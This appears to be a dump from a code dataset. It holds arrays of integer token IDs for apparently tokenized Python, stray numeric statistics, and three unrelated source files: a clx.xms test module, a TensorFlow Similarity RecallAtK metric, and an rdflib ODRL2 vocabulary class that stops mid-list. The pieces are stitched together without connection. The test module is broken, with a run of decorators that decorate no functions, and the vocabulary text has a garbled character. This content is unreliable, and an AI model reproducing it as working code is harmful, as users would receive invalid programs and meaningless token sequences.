220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
6322,
51,
62,
12966,
30094,
1600,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
6322,
51,
62,
11395,
62,
25460,
1600,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
6322,
51,
62,
13434,
1600,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
6322,
51,
62,
11395,
62,
31715,
62,
37535,
1,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1267,
2599,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4808,
12683,
796,
357,
20274,
1222,
657,
65,
16,
8269,
24598,
8,
9609,
1315,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4808,
11201,
3471,
796,
357,
20274,
1222,
657,
65,
486,
16243,
8269,
830,
8,
9609,
1367,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4808,
76,
415,
20782,
796,
1255,
1222,
657,
65,
2388,
486,
26259,
26259,
1157,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
25294,
30373,
13,
24442,
7,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
39491,
5794,
1391,
15,
25,
65,
92,
4613,
264,
29164,
16,
25,
65,
92,
837,
220,
285,
29164,
17,
25,
65,
92,
837,
304,
29164,
18,
25,
65,
92,
6,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
764,
18982,
7,
20274,
11,
4808,
12683,
11,
4808,
76,
415,
20782,
11,
4808,
11201,
3471,
4008,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
4808,
12683,
6624,
352,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4808,
76,
415,
20782,
796,
532,
7,
93,
28264,
76,
415,
20782,
532,
352,
8,
1222,
657,
87,
2998,
487,
8,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
7,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1391,
26059,
62,
312,
25,
357,
15,
13,
486,
1635,
357,
17,
12429,
4808,
11201,
3471,
8,
1635,
4808,
76,
415,
20782,
8,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
357,
13664,
6624,
604,
8,
290,
357,
26059,
62,
4906,
287,
5855,
6322,
51,
62,
13739,
28925,
1600,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
6322,
51,
62,
13739,
28925,
62,
74,
1199,
1,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1267,
2599,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
1255,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
25294,
30373,
13,
18224,
10786,
19608,
265,
2981,
407,
9177,
25,
4064,
82,
46083,
288,
79,
62,
4906,
8,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1441,
201,
198,
220,
220,
220,
220,
220,
220,
220,
611,
288,
79,
62,
312,
287,
2116,
13557,
26059,
62,
27160,
13,
13083,
33529,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
25294,
30373,
13,
24442,
10786,
12501,
9043,
27704,
4064,
82,
1058,
4064,
82,
796,
4064,
82,
59,
77,
3256,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
79,
62,
312,
11,
1148,
76,
23,
13,
35,
1404,
2969,
46,
1268,
4694,
58,
26059,
62,
312,
4357,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
58,
26059,
62,
312,
12962,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
25294,
30373,
13,
18224,
10786,
24089,
407,
36899,
27704,
4064,
82,
1058,
4064,
82,
59,
77,
3256,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
79,
62,
312,
11,
1148,
76,
23,
13,
35,
1404,
2969,
46,
1268,
4694,
58,
26059,
62,
312,
12962,
201,
198,
201,
198,
220,
220,
220,
825,
4637,
62,
33224,
7,
944,
11,
2859,
2599,
201,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1148,
1444,
618,
4637,
5645,
13,
20612,
17802,
13,
201,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
25294,
30373,
13,
24442,
10786,
31125,
23,
4838,
262,
4637,
13,
1273,
33307,
11537,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
15236,
796,
10352,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
7645,
634,
13,
19836,
3419,
201,
198,
201,
198,
220,
220,
220,
825,
1100,
7,
944,
11,
288,
79,
62,
312,
2599,
201,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
201,
198,
220,
220,
220,
220,
220,
220,
220,
16409,
12694,
1988,
422,
2839,
7177,
286,
12694,
12,
961,
654,
201,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
201,
198,
220,
220,
220,
220,
220,
220,
220,
611,
288,
79,
62,
312,
287,
2116,
13557,
26059,
62,
27160,
13,
13083,
33529,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1441,
2116,
13557,
26059,
62,
27160,
58,
26059,
62,
312,
60,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1441,
6045,
201,
198,
201,
198,
201,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
201,
198,
201,
198,
220,
220,
220,
4808,
25294,
30373,
796,
18931,
13,
1136,
11187,
1362,
7,
834,
3672,
834,
8,
201,
198,
220,
220,
220,
18931,
13,
35487,
16934,
3419,
201,
198,
220,
220,
220,
4808,
25294,
30373,
13,
2617,
4971,
7,
6404,
2667,
13,
30531,
8,
201,
198,
201,
198,
220,
220,
220,
1303,
329,
4856,
4959,
691,
11,
16507,
319,
14257,
5072,
201,
198,
220,
220,
220,
616,
19703,
4668,
796,
1148,
76,
23,
3419,
201,
198,
220,
220,
220,
329,
8251,
11,
3815,
287,
616,
19703,
4668,
13,
1136,
62,
439,
62,
82,
641,
669,
22446,
23814,
33529,
201,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
7203,
4,
82,
25,
220,
4064,
82,
59,
77,
1,
4064,
357,
13083,
11,
3815,
4008,
201,
198,
201,
198,
220,
220,
220,
4808,
15596,
26268,
796,
30351,
952,
13,
1136,
62,
15596,
62,
26268,
3419,
201,
198,
220,
220,
220,
1162,
78,
796,
4808,
15596,
26268,
13,
17953,
62,
15388,
7,
1820,
19703,
4668,
13,
69,
9548,
11,
705,
3256,
1105,
22914,
8,
201,
198,
220,
220,
220,
4808,
15388,
796,
4808,
15596,
26268,
13,
5143,
62,
28446,
62,
20751,
7,
10215,
78,
8,
201,
198,
220,
220,
220,
1303,
35557,
7007,
1566,
19212,
10,
34,
318,
12070,
201,
198,
220,
220,
220,
4808,
25294,
30373,
13,
24442,
10786,
33484,
1780,
329,
3180,
44,
23,
4637,
319,
4064,
82,
3256,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4808,
15388,
13,
82,
11603,
58,
15,
4083,
11407,
735,
3672,
28955,
201,
198,
220,
220,
220,
4808,
15596,
26268,
13,
5143,
62,
754,
332,
3419,
201,
198
] | 1.921392 | 14,566 |
# -*- coding: utf-8 -*-
# pylint: disable=missing-docstring
# pylint: disable=wildcard-import
# pylint: disable=unused-wildcard-import
# pylint: disable=invalid-name
from datetime import datetime
import json
from clx.xms import api, exceptions, deserialize
from nose.tools import *
from iso8601 import UTC
@raises(exceptions.UnexpectedResponseException)
@raises(exceptions.UnexpectedResponseException)
@raises(exceptions.UnexpectedResponseException)
@raises(exceptions.UnexpectedResponseException)
@raises(exceptions.UnexpectedResponseException)
@raises(exceptions.UnexpectedResponseException)
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
279,
2645,
600,
25,
15560,
28,
45688,
12,
15390,
8841,
198,
2,
279,
2645,
600,
25,
15560,
28,
21992,
9517,
12,
11748,
198,
2,
279,
2645,
600,
25,
15560,
28,
403,
1484,
12,
21992,
9517,
12,
11748,
198,
2,
279,
2645,
600,
25,
15560,
28,
259,
12102,
12,
3672,
198,
198,
6738,
4818,
8079,
1330,
4818,
8079,
198,
11748,
33918,
198,
6738,
537,
87,
13,
87,
907,
1330,
40391,
11,
13269,
11,
748,
48499,
1096,
198,
6738,
9686,
13,
31391,
1330,
1635,
198,
6738,
47279,
4521,
486,
1330,
18119,
198,
198,
31,
430,
2696,
7,
1069,
11755,
13,
52,
42072,
31077,
16922,
8,
198,
198,
31,
430,
2696,
7,
1069,
11755,
13,
52,
42072,
31077,
16922,
8,
198,
198,
31,
430,
2696,
7,
1069,
11755,
13,
52,
42072,
31077,
16922,
8,
198,
198,
31,
430,
2696,
7,
1069,
11755,
13,
52,
42072,
31077,
16922,
8,
198,
198,
31,
430,
2696,
7,
1069,
11755,
13,
52,
42072,
31077,
16922,
8,
198,
198,
31,
430,
2696,
7,
1069,
11755,
13,
52,
42072,
31077,
16922,
8,
198
] | 3.179894 | 189 |
# Copyright 2021 The TensorFlow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
from .retrieval_metric import RetrievalMetric
from tensorflow_similarity.types import FloatTensor, IntTensor, BoolTensor
class RecallAtK(RetrievalMetric):
"""The metric learning version of Recall@K.
A query is counted as a positive when ANY lookup in top K match the query
class, 0 otherwise.
Args:
name: Name associated with the metric object, e.g., recall@5
canonical_name: The canonical name associated with metric,
e.g., recall@K
k: The number of nearest neighbors over which the metric is computed.
distance_threshold: The max distance below which a nearest neighbor is
considered a valid match.
average: {'micro'} Determines the type of averaging performed over the
queries.
* 'micro': Calculates metrics globally over all queries.
* 'macro': Calculates metrics for each label and takes the unweighted
mean.
"""
def compute(
self,
*, # keyword only arguments see PEP-570
query_labels: IntTensor,
match_mask: BoolTensor,
**kwargs,
) -> FloatTensor:
"""Compute the metric
Args:
query_labels: A 1D tensor of the labels associated with the
embedding queries.
match_mask: A 2D mask where a 1 indicates a match between the
jth query and the kth neighbor and a 0 indicates a mismatch.
**kwargs: Additional compute args.
Returns:
A rank 0 tensor containing the metric.
"""
self._check_shape(query_labels, match_mask)
k_slice = match_mask[:, : self.k]
match_indicator = tf.math.reduce_any(k_slice, axis=1)
match_indicator = tf.cast(match_indicator, dtype="float")
if self.average == "micro":
recall_at_k = tf.math.reduce_mean(match_indicator)
elif self.average == "macro":
per_class_metrics = 0
class_labels = tf.unique(query_labels)[0]
# TODO(ovallis): potential slowness.
for label in class_labels:
idxs = tf.where(query_labels == label)
c_slice = tf.gather(match_indicator, indices=idxs)
per_class_metrics += tf.math.reduce_mean(c_slice)
recall_at_k = tf.math.divide(per_class_metrics, len(class_labels))
else:
raise ValueError(
f"{self.average} is not a supported average " "option"
)
result: FloatTensor = recall_at_k
return result
| [
2,
15069,
33448,
383,
309,
22854,
37535,
46665,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
13,
198,
2,
921,
743,
7330,
257,
4866,
286,
262,
13789,
379,
198,
2,
198,
2,
220,
220,
220,
220,
220,
2638,
1378,
2503,
13,
43073,
13,
2398,
14,
677,
4541,
14,
43,
2149,
24290,
12,
17,
13,
15,
198,
2,
198,
2,
17486,
2672,
416,
9723,
1099,
393,
4987,
284,
287,
3597,
11,
3788,
198,
2,
9387,
739,
262,
13789,
318,
9387,
319,
281,
366,
1921,
3180,
1,
29809,
1797,
11,
198,
2,
42881,
34764,
11015,
6375,
7102,
49828,
11053,
3963,
15529,
509,
12115,
11,
2035,
4911,
393,
17142,
13,
198,
2,
4091,
262,
13789,
329,
262,
2176,
3303,
15030,
21627,
290,
198,
2,
11247,
739,
262,
13789,
13,
198,
198,
11748,
11192,
273,
11125,
355,
48700,
198,
198,
6738,
764,
1186,
380,
18206,
62,
4164,
1173,
1330,
4990,
380,
18206,
9171,
1173,
198,
6738,
11192,
273,
11125,
62,
38610,
414,
13,
19199,
1330,
48436,
51,
22854,
11,
2558,
51,
22854,
11,
347,
970,
51,
22854,
628,
198,
4871,
44536,
2953,
42,
7,
9781,
380,
18206,
9171,
1173,
2599,
198,
220,
220,
220,
37227,
464,
18663,
4673,
2196,
286,
44536,
31,
42,
13,
628,
220,
220,
220,
317,
12405,
318,
14789,
355,
257,
3967,
618,
15529,
35847,
287,
1353,
509,
2872,
262,
12405,
198,
220,
220,
220,
1398,
11,
657,
4306,
13,
628,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1438,
25,
6530,
3917,
351,
262,
18663,
2134,
11,
304,
13,
70,
1539,
10014,
31,
20,
628,
220,
220,
220,
220,
220,
220,
220,
40091,
62,
3672,
25,
383,
40091,
1438,
3917,
351,
18663,
11,
198,
220,
220,
220,
220,
220,
220,
220,
304,
13,
70,
1539,
10014,
31,
42,
628,
220,
220,
220,
220,
220,
220,
220,
479,
25,
383,
1271,
286,
16936,
12020,
625,
543,
262,
18663,
318,
29231,
13,
628,
220,
220,
220,
220,
220,
220,
220,
5253,
62,
400,
10126,
25,
383,
3509,
5253,
2174,
543,
257,
16936,
4780,
318,
198,
220,
220,
220,
220,
220,
220,
220,
3177,
257,
4938,
2872,
13,
628,
220,
220,
220,
220,
220,
220,
220,
2811,
25,
1391,
6,
24055,
6,
92,
360,
13221,
274,
262,
2099,
286,
20430,
6157,
625,
262,
198,
220,
220,
220,
220,
220,
220,
220,
20743,
13,
628,
220,
220,
220,
220,
220,
220,
220,
1635,
705,
24055,
10354,
27131,
689,
20731,
18309,
625,
477,
20743,
13,
628,
220,
220,
220,
220,
220,
220,
220,
1635,
705,
20285,
305,
10354,
27131,
689,
20731,
329,
1123,
6167,
290,
2753,
262,
555,
6551,
276,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1612,
13,
198,
220,
220,
220,
37227,
628,
220,
220,
220,
825,
24061,
7,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
11,
198,
220,
220,
220,
220,
220,
220,
220,
1635,
11,
220,
1303,
21179,
691,
7159,
766,
350,
8905,
12,
39254,
198,
220,
220,
220,
220,
220,
220,
220,
12405,
62,
23912,
1424,
25,
2558,
51,
22854,
11,
198,
220,
220,
220,
220,
220,
220,
220,
2872,
62,
27932,
25,
347,
970,
51,
22854,
11,
198,
220,
220,
220,
220,
220,
220,
220,
12429,
46265,
22046,
11,
198,
220,
220,
220,
1267,
4613,
48436,
51,
22854,
25,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
7293,
1133,
262,
18663,
628,
220,
220,
220,
220,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
12405,
62,
23912,
1424,
25,
317,
352,
35,
11192,
273,
286,
262,
14722,
3917,
351,
262,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
11525,
12083,
20743,
13,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2872,
62,
27932,
25,
317,
362,
35,
9335,
810,
257,
352,
9217,
257,
2872,
1022,
262,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
474,
400,
12405,
290,
262,
479,
400,
4780,
290,
257,
657,
9217,
257,
46318,
13,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
12429,
46265,
22046,
25,
15891,
24061,
26498,
13,
628,
220,
220,
220,
220,
220,
220,
220,
16409,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
317,
4279,
657,
11192,
273,
7268,
262,
18663,
13,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
9122,
62,
43358,
7,
22766,
62,
23912,
1424,
11,
2872,
62,
27932,
8,
628,
220,
220,
220,
220,
220,
220,
220,
479,
62,
48369,
796,
2872,
62,
27932,
58,
45299,
1058,
2116,
13,
74,
60,
198,
220,
220,
220,
220,
220,
220,
220,
2872,
62,
521,
26407,
796,
48700,
13,
11018,
13,
445,
7234,
62,
1092,
7,
74,
62,
48369,
11,
16488,
28,
16,
8,
198,
220,
220,
220,
220,
220,
220,
220,
2872,
62,
521,
26407,
796,
48700,
13,
2701,
7,
15699,
62,
521,
26407,
11,
288,
4906,
2625,
22468,
4943,
628,
220,
220,
220,
220,
220,
220,
220,
611,
2116,
13,
23913,
6624,
366,
24055,
1298,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
10014,
62,
265,
62,
74,
796,
48700,
13,
11018,
13,
445,
7234,
62,
32604,
7,
15699,
62,
521,
26407,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
2116,
13,
23913,
6624,
366,
20285,
305,
1298,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
583,
62,
4871,
62,
4164,
10466,
796,
657,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1398,
62,
23912,
1424,
796,
48700,
13,
34642,
7,
22766,
62,
23912,
1424,
38381,
15,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
16926,
46,
7,
709,
439,
271,
2599,
2785,
1017,
593,
408,
13,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
6167,
287,
1398,
62,
23912,
1424,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4686,
34223,
796,
48700,
13,
3003,
7,
22766,
62,
23912,
1424,
6624,
6167,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
269,
62,
48369,
796,
48700,
13,
70,
1032,
7,
15699,
62,
521,
26407,
11,
36525,
28,
312,
34223,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
583,
62,
4871,
62,
4164,
10466,
15853,
48700,
13,
11018,
13,
445,
7234,
62,
32604,
7,
66,
62,
48369,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
10014,
62,
265,
62,
74,
796,
48700,
13,
11018,
13,
7146,
485,
7,
525,
62,
4871,
62,
4164,
10466,
11,
18896,
7,
4871,
62,
23912,
1424,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5298,
11052,
12331,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
277,
1,
90,
944,
13,
23913,
92,
318,
407,
257,
4855,
2811,
366,
366,
18076,
1,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1267,
198,
220,
220,
220,
220,
220,
220,
220,
1255,
25,
48436,
51,
22854,
796,
10014,
62,
265,
62,
74,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
1255,
198
] | 2.514286 | 1,260 |
from rdflib.namespace import DefinedNamespace, Namespace
from rdflib.term import URIRef
class ODRL2(DefinedNamespace):
"""
ODRL Version 2.2
The ODRL Vocabulary and Expression defines a set of concepts and terms (the vocabulary) and encoding mechanism
(the expression) for permissions and obligations statements describing digital content usage based on the ODRL
Information Model.
Generated from: https://www.w3.org/ns/odrl/2/ODRL22.ttl
Date: 2020-05-26 14:20:02.352356
"""
_fail = True
# http://www.w3.org/1999/02/22-rdf-syntax-ns#Property
action: URIRef # The operation relating to the Asset for which the Rule is being subjected.
andSequence: URIRef # The relation is satisfied when each of the Constraints are satisfied in the order specified.
assignee: URIRef # The Party is the recipient of the Rule.
assigneeOf: URIRef # Identifies an ODRL Policy for which the identified Party undertakes the assignee functional role.
assigner: URIRef # The Party is the issuer of the Rule.
assignerOf: URIRef # Identifies an ODRL Policy for which the identified Party undertakes the assigner functional role.
attributedParty: URIRef # The Party to be attributed.
attributingParty: URIRef # The Party who undertakes the attribution.
compensatedParty: URIRef # The Party is the recipient of the compensation.
compensatingParty: URIRef # The Party that is the provider of the compensation.
conflict: URIRef # The conflict-resolution strategy for a Policy.
consentedParty: URIRef # The Party who obtains the consent.
consentingParty: URIRef # The Party to obtain consent from.
consequence: URIRef # Relates a Duty to another Duty, the latter being a consequence of not fulfilling the former.
constraint: URIRef # Constraint applied to a Rule
contractedParty: URIRef # The Party who is being contracted.
contractingParty: URIRef # The Party who is offering the contract.
dataType: URIRef # The datatype of the value of the rightOperand or rightOperandReference of a Constraint.
duty: URIRef # Relates an individual Duty to a Permission.
failure: URIRef # Failure is an abstract property that defines the violation (or unmet) relationship between Rules.
function: URIRef # Function is an abstract property whose sub-properties define the functional roles which may be fulfilled by a party in relation to a Rule.
hasPolicy: URIRef # Identifies an ODRL Policy for which the identified Asset is the target Asset to all the Rules.
implies: URIRef # An Action asserts that another Action is not prohibited to enable its operational semantics.
includedIn: URIRef # An Action transitively asserts that another Action that encompasses its operational semantics.
informedParty: URIRef # The Party to be informed of all uses.
informingParty: URIRef # The Party who provides the inform use data.
inheritAllowed: URIRef # Indicates if the Policy entity can be inherited.
inheritFrom: URIRef # Relates a (child) policy to another (parent) policy from which terms are inherited.
inheritRelation: URIRef # Identifies the type of inheritance.
leftOperand: URIRef # The left operand in a constraint expression.
obligation: URIRef # Relates an individual Duty to a Policy.
operand: URIRef # Operand is an abstract property for a logical relationship.
operator: URIRef # The operator function applied to operands of a Constraint
output: URIRef # The output property specifies the Asset which is created from the output of the Action.
partOf: URIRef # Identifies an Asset/PartyCollection that the Asset/Party is a member of.
payeeParty: URIRef # The Party is the recipient of the payment.
permission: URIRef # Relates an individual Permission to a Policy.
profile: URIRef # The identifier(s) of an ODRL Profile that the Policy conforms to.
prohibition: URIRef # Relates an individual Prohibition to a Policy.
proximity: URIRef # An value indicating the closeness or nearness.
refinement: URIRef # Constraint used to refine the semantics of an Action, or Party/Asset Collection
relation: URIRef # Relation is an abstract property which creates an explicit link between an Action and an Asset.
remedy: URIRef # Relates an individual remedy Duty to a Prohibition.
rightOperand: URIRef # The value of the right operand in a constraint expression.
rightOperandReference: URIRef # A reference to a web resource providing the value for the right operand of a Constraint.
scope: URIRef # The identifier of a scope that provides context to the extent of the entity.
source: URIRef # Reference to a Asset/PartyCollection
status: URIRef # the value generated from the leftOperand action or a value related to the leftOperand set as the reference for the comparison.
target: URIRef # The target property indicates the Asset that is the primary subject to which the Rule action directly applies.
timedCount: URIRef # The number of seconds after which timed metering use of the asset begins.
trackedParty: URIRef # The Party whose usage is being tracked.
trackingParty: URIRef # The Party who is tracking usage.
uid: URIRef # An unambiguous identifier
undefined: URIRef # Relates the strategy used for handling undefined actions to a Policy.
unit: URIRef # The unit of measurement of the value of the rightOperand or rightOperandReference of a Constraint.
xone: URIRef # The relation is satisfied when only one, and not more, of the Constraints is satisfied
# http://www.w3.org/2002/07/owl#NamedIndividual
All: URIRef # Specifies that the scope of the relationship is all of the collective individuals within a context.
All2ndConnections: URIRef # Specifies that the scope of the relationship is all of the second-level connections to the Party.
AllConnections: URIRef # Specifies that the scope of the relationship is all of the first-level connections of the Party.
AllGroups: URIRef # Specifies that the scope of the relationship is all of the group connections of the Party.
Group: URIRef # Specifies that the scope of the relationship is the defined group with multiple individual members.
Individual: URIRef # Specifies that the scope of the relationship is the single Party individual.
absolutePosition: URIRef # A point in space or time defined with absolute coordinates for the positioning of the target Asset.
absoluteSize: URIRef # Measure(s) of one or two axes for 2D-objects or measure(s) of one to tree axes for 3D-objects of the target Asset.
absoluteSpatialPosition: URIRef # The absolute spatial positions of four corners of a rectangle on a 2D-canvas or the eight corners of a cuboid in a 3D-space for the target Asset to fit.
absoluteTemporalPosition: URIRef # The absolute temporal positions in a media stream the target Asset has to fit.
count: URIRef # Numeric count of executions of the action of the Rule.
dateTime: URIRef # The date (and optional time and timezone) of exercising the action of the Rule. Right operand value MUST be an xsd:date or xsd:dateTime as defined by [[xmlschema11-2]].
delayPeriod: URIRef # A time delay period prior to exercising the action of the Rule. The point in time triggering this period MAY be defined by another temporal Constraint combined by a Logical Constraint (utilising the odrl:andSequence operand). Right operand value MUST be an xsd:duration as defined by [[xmlschema11-2]].
deliveryChannel: URIRef # The delivery channel used for exercising the action of the Rule.
device: URIRef # An identified device used for exercising the action of the Rule.
elapsedTime: URIRef # A continuous elapsed time period which may be used for exercising of the action of the Rule. Right operand value MUST be an xsd:duration as defined by [[xmlschema11-2]].
eq: URIRef # Indicating that a given value equals the right operand of the Constraint.
event: URIRef # An identified event setting a context for exercising the action of the Rule.
fileFormat: URIRef # A transformed file format of the target Asset.
gt: URIRef # Indicating that a given value is greater than the right operand of the Constraint.
gteq: URIRef # Indicating that a given value is greater than or equal to the right operand of the Constraint.
hasPart: URIRef # A set-based operator indicating that a given value contains the right operand of the Constraint.
ignore: URIRef # The Action is to be ignored and is not part of the policy โ and the policy remains valid.
industry: URIRef # A defined industry sector setting a context for exercising the action of the Rule.
invalid: URIRef # The policy is void.
isA: URIRef # A set-based operator indicating that a given value is an instance of the right operand of the Constraint.
isAllOf: URIRef # A set-based operator indicating that a given value is all of the right operand of the Constraint.
isAnyOf: URIRef # A set-based operator indicating that a given value is any of the right operand of the Constraint.
isNoneOf: URIRef # A set-based operator indicating that a given value is none of the right operand of the Constraint.
isPartOf: URIRef # A set-based operator indicating that a given value is contained by the right operand of the Constraint.
language: URIRef # A natural language used by the target Asset.
lt: URIRef # Indicating that a given value is less than the right operand of the Constraint.
lteq: URIRef # Indicating that a given value is less than or equal to the right operand of the Constraint.
media: URIRef # Category of a media asset setting a context for exercising the action of the Rule.
meteredTime: URIRef # An accumulated amount of one to many metered time periods which were used for exercising the action of the Rule. Right operand value MUST be an xsd:duration as defined by [[xmlschema11-2]].
neq: URIRef # Indicating that a given value is not equal to the right operand of the Constraint.
payAmount: URIRef # The amount of a financial payment. Right operand value MUST be an xsd:decimal.
percentage: URIRef # A percentage amount of the target Asset relevant for exercising the action of the Rule. Right operand value MUST be an xsd:decimal from 0 to 100.
perm: URIRef # Permissions take preference over prohibitions.
policyUsage: URIRef # Indicates the actual datetime the action of the Rule was exercised.
product: URIRef # Category of product or service setting a context for exercising the action of the Rule.
prohibit: URIRef # Prohibitions take preference over permissions.
purpose: URIRef # A defined purpose for exercising the action of the Rule.
recipient: URIRef # The party receiving the result/outcome of exercising the action of the Rule.
relativePosition: URIRef # A point in space or time defined with coordinates relative to full measures the positioning of the target Asset.
relativeSize: URIRef # Measure(s) of one or two axes for 2D-objects or measure(s) of one to tree axes for 3D-objects - expressed as percentages of full values - of the target Asset.
